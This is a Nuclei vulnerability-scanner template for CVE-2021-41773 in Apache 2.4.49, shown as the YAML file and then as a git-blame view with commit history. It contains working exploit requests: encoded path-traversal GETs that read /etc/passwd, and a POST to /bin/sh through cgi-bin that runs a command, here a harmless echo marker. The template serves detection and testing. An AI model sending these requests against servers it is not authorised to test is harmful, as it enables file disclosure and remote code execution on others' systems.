nuclei-templates/http/cves/2021/CVE-2021-41773.yaml

id: CVE-2021-41773

info:
  name: Apache 2.4.49 - Path Traversal and Remote Code Execution
  author: daffainfo,666asd
  severity: high
  description: |
    A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
  reference:
    - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
    - https://twitter.com/ptswarm/status/1445376079548624899
    - https://twitter.com/h4x0r_dz/status/1445401960371429381
    - https://github.com/blasty/CVE-2021-41773
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-41773
    cwe-id: CWE-22
    epss-score: 0.97532
    cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    shodan-query: Apache 2.4.49
    verified: true
    vendor: apache
    product: http_server
  tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
variables:
  cmd: "echo COP-37714-1202-EVC | rev"

http:
  - raw:
      - |
        GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        echo Content-Type: text/plain; echo; {{cmd}}

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: word
        name: RCE
        words:
          - "CVE-2021-41773-POC"

      - type: regex
        name: LFI
        regex:
          - "root:.*:0:0:"
Create CVE-2021-41773.yaml 2021-10-05 14:49:36 +00:00			`id: CVE-2021-41773`

			`info:`
Updating CVE-2021-41773 / CVE-2021-42013 to include RCE check 2021-10-10 00:30:43 +00:00			`name: Apache 2.4.49 - Path Traversal and Remote Code Execution`
Update CVE-2021-41773.yaml 2022-08-25 07:48:45 +00:00			`author: daffainfo,666asd`
Auto Generated CVE annotations [Wed Oct 13 08:57:56 UTC 2021] :robot: 2021-10-13 08:57:56 +00:00			`severity: high`
Update CVE-2021-41773.yaml 2022-12-16 08:23:01 +00:00			`description: \|`
			`A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.`
Create CVE-2021-41773.yaml 2021-10-05 14:49:36 +00:00			`reference:`
			`- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-41773`
Dashboard Text Enhancement (#3798) Dashboard text enhancements 2022-02-28 14:09:26 +00:00			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773`
more sources 2021-10-05 15:03:10 +00:00			`- https://twitter.com/ptswarm/status/1445376079548624899`
misc update 2021-10-05 15:02:16 +00:00			`- https://twitter.com/h4x0r_dz/status/1445401960371429381`
Updating CVE-2021-41773 / CVE-2021-42013 to include RCE check 2021-10-10 00:30:43 +00:00			`- https://github.com/blasty/CVE-2021-41773`
Auto Generated CVE annotations [Wed Oct 13 08:57:56 UTC 2021] :robot: 2021-10-13 08:57:56 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 7.5`
Auto Generated CVE annotations [Wed Oct 13 08:57:56 UTC 2021] :robot: 2021-10-13 08:57:56 +00:00			`cve-id: CVE-2021-41773`
			`cwe-id: CWE-22`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`epss-score: 0.97532`
			`cpe: cpe:2.3:a:apache:http_server:2.4.49:::::::*`
Update CVE-2021-41773.yaml shodan query added 2021-10-14 06:52:10 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 3`
Update CVE-2021-41773.yaml 2022-12-16 08:23:01 +00:00			`shodan-query: Apache 2.4.49`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: apache`
			`product: http_server`
Updated "cisa" tags to "kev" + added tags to new applicable templates (#4871) 2022-07-21 17:18:22 +00:00			`tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev`
Update CVE-2021-41773.yaml 2022-08-25 07:48:45 +00:00			`variables:`
			`cmd: "echo COP-37714-1202-EVC \| rev"`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Updating CVE-2021-41773 / CVE-2021-42013 to include RCE check 2021-10-10 00:30:43 +00:00			`- raw:`
			`- \|`
Updated CVE-2021-41773.yaml CVE-2021-42013.yaml 2022-08-23 07:30:32 +00:00			`GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1`
Updating CVE-2021-41773 / CVE-2021-42013 to include RCE check 2021-10-10 00:30:43 +00:00			`Host: {{Hostname}}`
Update CVE-2021-41773.yaml Improve CVE-2021-41773 detection 2022-11-30 13:59:46 +00:00			`- \|`
			`GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1`
			`Host: {{Hostname}}`
Updating CVE-2021-41773 / CVE-2021-42013 to include RCE check 2021-10-10 00:30:43 +00:00			`- \|`
Updated CVE-2021-41773.yaml CVE-2021-42013.yaml 2022-08-23 07:30:32 +00:00			`POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1`
Updating CVE-2021-41773 / CVE-2021-42013 to include RCE check 2021-10-10 00:30:43 +00:00			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

Update CVE-2021-41773.yaml 2022-08-25 07:48:45 +00:00			`echo Content-Type: text/plain; echo; {{cmd}}`
Updating CVE-2021-41773 / CVE-2021-42013 to include RCE check 2021-10-10 00:30:43 +00:00
Update CVE-2021-41773.yaml 2022-08-25 07:48:45 +00:00			`stop-at-first-match: true`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
Updating CVE-2021-41773 / CVE-2021-42013 to include RCE check 2021-10-10 00:30:43 +00:00			`matchers-condition: or`
Create CVE-2021-41773.yaml 2021-10-05 14:49:36 +00:00			`matchers:`
Updating CVE-2021-41773 / CVE-2021-42013 to include RCE check 2021-10-10 00:30:43 +00:00			`- type: word`
			`name: RCE`
			`words:`
Update CVE-2021-41773.yaml Fixes false positive due to IPS/ 'Request denied by WatchGuard Firewall.</p><p><b> Reason: </b> IPS detected for "WEB Apache HTTP Server Path traversal (CVE-2021-41773)"' 2021-10-21 03:57:23 +00:00			`- "CVE-2021-41773-POC"`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
			`- type: regex`
			`name: LFI`
			`regex:`
			`- "root:.*:0:0:"`